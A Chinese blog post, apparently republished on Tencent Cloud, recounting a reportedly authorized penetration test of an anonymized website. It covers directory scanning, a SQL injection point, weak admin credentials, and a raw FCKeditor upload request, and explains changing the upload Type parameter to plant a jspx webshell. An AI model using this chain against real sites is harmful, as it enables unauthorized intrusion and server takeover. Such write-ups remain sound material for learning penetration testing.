前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透思路页面源代码查看

渗透思路页面源代码查看

作者头像
ittongluren
发布2019-11-20 14:18:56
1.2K0
发布2019-11-20 14:18:56
举报
文章被收录于专栏:it同路人it同路人
很早之前的测试记录,天下网站千千万,唯有思路最重要。

这个网站已经关闭,改版过,经授权测试。

御剑直接扫目录

扫描后台:http://www.XXXX.cn/admin

随便一找就是注入点 http://www.XXXX.cn/list.jsp?classid=17

跑数据 账号admin 密码123456 一顿操作猛如虎,一看密码123456

直接登录进入

然后发现后台被阉割了,找不到上传地址什么的。但是用御剑扫目录扫到了fck ===========================

脑子一闪,从源代码查看一下,通过源码里面的一些链接找到线索。

然后点击那个超链接直接跳转到文章编辑的页面http://www.XXXX.cn/admin/index.jsp?mFrm=leftmenu4.jsp 因为之前就扫到是fck的编辑器,ok,直接添加图片,burp上传

POST /FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image&colId=1&cid=1 HTTP/1.1 Host: www.lXXX.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://www.XXX.cn/FCKeditor/editor/dialog/fck_image.html Cookie: JSESSIONID=A924385CB65ABA03EC6898D6552B5D7B DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------14887232939352 Content-Length: 194 -----------------------------14887232939352 Content-Disposition: form-data; name="NewFile"; filename="bbbb.jpg" Content-Type: image/jpeg 111 -----------------------------14887232939352-- 但是这里又出现毛病发现上传jsp TXT都提示成功 但是访问都404 思考一小时,观察上传路径:

/FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image&colId=1&cid=1 发现上传的目录是type=image 考虑设置了image目录只能上传图片 然后把type改为file 成功上传 但是必须是jspx的马儿 jsp被GG掉,原因不明 总结:

前面跑数据,扫后台都是常规操作,没亮点。

亮点一、通过查看源码找到阉割之前的上传按钮 亮点二、上传成功但是不能执行,直接被杀,分析是不是上传目录问题,要不就是马儿不免杀,被杀软杀了。因为这两个问题在渗透测试中很常见。

作者:吹皱一池春水 (文章转载请注明来自:IT同路人论坛)

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-11-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 it同路人 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档